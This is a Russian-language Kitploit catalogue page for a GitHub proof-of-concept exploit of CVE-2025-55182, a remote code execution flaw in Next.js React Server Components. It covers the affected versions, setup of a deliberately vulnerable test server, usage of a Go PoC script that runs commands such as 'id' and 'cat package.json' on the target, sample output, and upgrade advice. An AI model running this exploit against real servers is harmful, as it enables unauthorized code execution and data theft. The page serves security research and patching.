Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Эксплоит (proof-of-concept) для CVE-2025-55182, уязвимости удаленного выполнения кода (RCE) в Next.js через небезопасную десериализацию в RSC-запросах. Включает POC-скрипт на Go и уязвимый тестовый сервер для исследований в области безопасности и обучения. | Kitploit
Инструменты/GitHubGitHub/hoosin/cve-2025-55182
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubhoosin/cve-2025-55182

CVE-2025-55182

Эксплоит (proof-of-concept) для CVE-2025-55182, уязвимости удаленного выполнения кода (RCE) в Next.js через небезопасную десериализацию в RSC-запросах. Включает POC-скрипт на Go и уязвимый тестовый сервер для исследований в области безопасности и обучения.

Репозиторий
389 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 Руководство по воспроизведению RCE в Next.js

Отказ от ответственности

⚠️ Этот инструмент предназначен только для исследований безопасности и образовательных целей. Не используйте в незаконных целях. ⚠️

Описание уязвимости

CVE-2025-55182 — это критическая уязвимость удаленного выполнения кода (RCE) во фреймворке Next.js. Уязвимость вызвана небезопасной десериализацией при обработке запросов к React Server Components (RSC). Злоумышленник может выполнить произвольный код на сервере без авторизации, отправив вредоносный HTTP-запрос.

Затронутые версии:

  • Next.js 15.x < 15.0.5
  • Next.js 16.x < 16.0.7
  • и некоторые Canary-версии

Настройка среды

Этот проект предоставляет уязвимый тестовый сервер Next.js test-server.

1. Запуск тестового сервера

Убедитесь, что у вас установлены Node.js и npm.

cd test-server
npm install
npm run dev

Сервер по умолчанию запускается на http://localhost:3000.

Примечание: Если возникла ошибка с lock-файлом, попробуйте выполнить:

rm -f .next/dev/lock && npm run dev

Воспроизведение уязвимости (POC)

Этот проект предоставляет POC-скрипт на Go poc.go.

Использование Go-скрипта

Использование:

go run poc.go [целевой_URL] [команда_для_выполнения]

Примеры:

  1. Выполнение команды id (по умолчанию)

    go run poc.go
    

    Или

    go run poc.go http://localhost:3000 id
    
  2. Просмотр файлов текущей директории

    go run poc.go http://localhost:3000 "ls -la"
    
  3. Просмотр содержимого файла

    go run poc.go http://localhost:3000 "cat package.json"
    

Ожидаемый вывод: Хотя HTTP-статус возвращает 500, результат выполнения команды будет включен в поле digest ответа.

1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}

Рекомендации по исправлению

Обновите Next.js до безопасной версии:

  • Next.js 15.x -> 15.0.5+
  • Next.js 16.x -> 16.0.7+
npm install next@latest react@latest react-dom@latest
Скачать инструмент